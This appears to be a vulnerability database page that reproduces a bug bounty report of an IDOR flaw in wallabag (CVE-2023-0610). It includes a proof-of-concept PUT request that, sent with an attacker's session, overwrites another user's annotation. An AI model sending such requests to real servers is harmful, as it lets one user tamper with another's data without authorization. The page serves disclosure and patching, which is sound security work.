Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
huntrBauh0lz8FDD9B31-D89B-4BBE-9557-20B960FAF926
HistoryJan 22, 2023 - 6:01 a.m.

IDOR vulnerability allowing to update another user's annotations

2023-01-2206:01:02
bauh0lz
www.huntr.dev
16
idor vulnerability" "updating annotations" "security bug" "data manipulation" "vulnerability discovery

EPSS

0.001

Percentile

25.5%

JSON

Description

IDOR vulnerability was discovered in wallabag.

Proof of Concept

  1. Login as a victim.
  2. Create an entry and an annotation. In this case the annotation’s ID is 3.
  3. Login as an attacker.
  4. Send the following request.

request

PUT /annotations/3 HTTP/1.1
Host: localhost:8000
Cookie: PHPSESSID=e23e2dfc1b530c1884bf17248448b979
Content-Length: 21

{"id":3,"text":"xxx"}
  1. Victim’s annotation created on step 2 is updated.

Related

osv 2
nvd 1
github 1
veracode 1
cve 1
cnvd 1
cvelist 1
prion 1
osv
osv
CVE-2023-0610
2023-02-01 12:15:09
wallabag subject to Improper Authorization via annotations
2023-02-02 19:26:47
nvd
nvd
CVE-2023-0610
2023-02-01 12:15:09
github
github
wallabag subject to Improper Authorization via annotations
2023-02-02 19:26:47
veracode
veracode
Improper Authorization
2023-02-02 07:10:59
cve
cve
CVE-2023-0610
2023-02-01 12:15:09
cnvd
cnvd
wallabag licensing issue vulnerability (CNVD-2023-07920)
2023-02-09 00:00:00
cvelist
cvelist
CVE-2023-0610 Improper Authorization in wallabag/wallabag
2023-02-01 00:00:00
prion
prion
Authorization
2023-02-01 12:15:00

EPSS

0.001

Percentile

25.5%

JSON
Related for 8FDD9B31-D89B-4BBE-9557-20B960FAF926
osv2nvd1github1veracode1cve1cnvd1cvelist1prion1